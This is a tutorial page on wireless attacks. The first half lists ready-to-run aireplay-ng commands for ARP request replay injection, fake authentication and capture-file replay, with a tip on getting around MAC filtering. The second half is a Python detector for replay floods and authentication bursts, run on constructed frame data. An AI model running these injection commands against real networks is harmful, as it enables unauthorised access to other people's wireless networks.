Wireless Attacks: Part I
Common Commands Used in Aircrack-ng
Injection Command
aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Fake Authentication Commands
aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Or another variation for picky access points
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
ARP Replay Attack
aireplay-ng -3 -b 00:13:10:30:24:9C mon0
Where:
-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
mon0 is the wireless interface name (here the monitor-mode interface created by airmon-ng; no -h is given, so the interface's own MAC is used as the source address)
Basic usage:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Where:
-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same command plus "-r" to read the output file from your last successful ARP replay.
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Where:
-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name
The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.
aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Where:
-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name
NOTE: Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. Thus, the advantage of the next technique (interactive replay) is that it gets around this control.
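Both techniques on this page leave a recognisable footprint on the air: ARP request replay re-sends the same captured frame thousands of times, so a wireless IDS sees a burst of data frames of identical length from one source address to one BSSID, and the fake-authentication loop (the -1 6000 -o 1 -q 10 variant above) shows up as repeated 802.11 authentication frames from a single source. The following detector is an added example written for this page, not part of aircrack-ng or any WIDS product. It runs over a constructed list of frame summaries (timestamp, frame kind, source MAC, BSSID, length) rather than a real capture, and the rate thresholds, window sizes, and the 68-byte replay length are assumptions chosen for the sample data; in practice the summaries would come from a monitor-mode capture on the defender's side.

```python
from collections import defaultdict

# Placeholder MAC addresses taken from the examples on this page.
AP = "00:13:10:30:24:9C"
INJECTOR = "00:11:22:33:44:55"
CLIENT = "00:0F:B5:46:11:19"


def build_sample_frames():
    """Return a constructed list of frame summaries (not a real capture).

    Each record is (timestamp_s, frame_kind, source_mac, bssid, length_bytes);
    frame_kind is "data" for data frames and "auth" for authentication frames.
    """
    frames = []
    # Legitimate client traffic: varying sizes at roughly 5 frames per second.
    for i in range(60):
        frames.append((i * 0.2, "data", CLIENT, AP, 100 + (i * 37) % 900))
    # Replayed ARP requests: identical-length frames from one source at ~300/s
    # (68 bytes is an assumed size for the sample only).
    for i in range(900):
        frames.append((5.0 + i / 300.0, "data", INJECTOR, AP, 68))
    # Repeated authentication frames from the same source within a few seconds.
    for i in range(12):
        frames.append((2.0 + i * 0.25, "auth", INJECTOR, AP, 30))
    return sorted(frames)


def detect_arp_replay(frames, window_s=1.0, min_frames=100):
    """Flag (src, bssid, length) seen min_frames or more times in one window.

    A replayed frame is re-sent unchanged, so the attack appears as a flood of
    data frames that all share the same length and source address. Returns a
    dict mapping each flagged tuple to its peak per-window count.
    """
    buckets = defaultdict(int)
    for t, kind, src, bssid, length in frames:
        if kind == "data":
            buckets[(src, bssid, length, int(t // window_s))] += 1
    hits = {}
    for (src, bssid, length, _bucket), count in buckets.items():
        if count >= min_frames:
            key = (src, bssid, length)
            hits[key] = max(hits.get(key, 0), count)
    return hits


def detect_auth_burst(frames, window_s=5.0, min_auth=5):
    """Flag (src, bssid) pairs with min_auth+ authentication frames in window_s.

    Uses a sliding window over the sorted timestamps so a slow, steady retry
    loop is caught as well as a single burst. Returns {pair: peak count}.
    """
    times = defaultdict(list)
    for t, kind, src, bssid, _length in frames:
        if kind == "auth":
            times[(src, bssid)].append(t)
    hits = {}
    for key, ts in times.items():
        ts.sort()
        start = 0
        best = 0
        for i, t in enumerate(ts):
            while ts[start] < t - window_s:
                start += 1
            best = max(best, i - start + 1)
        if best >= min_auth:
            hits[key] = best
    return hits


if __name__ == "__main__":
    sample = build_sample_frames()
    for (src, bssid, length), count in detect_arp_replay(sample).items():
        print(f"possible ARP replay: {src} -> {bssid}, {length}-byte frames, "
              f"peak {count}/s")
    for (src, bssid), count in detect_auth_burst(sample).items():
        print(f"authentication burst: {src} -> {bssid}, {count} auth frames "
              f"in 5 s")
```

The legitimate client never trips either rule because its frame lengths vary and its rate is low; only the injector's constant-length flood and its repeated authentication frames are reported. Tuning the thresholds against a baseline capture of the real network is the main deployment step.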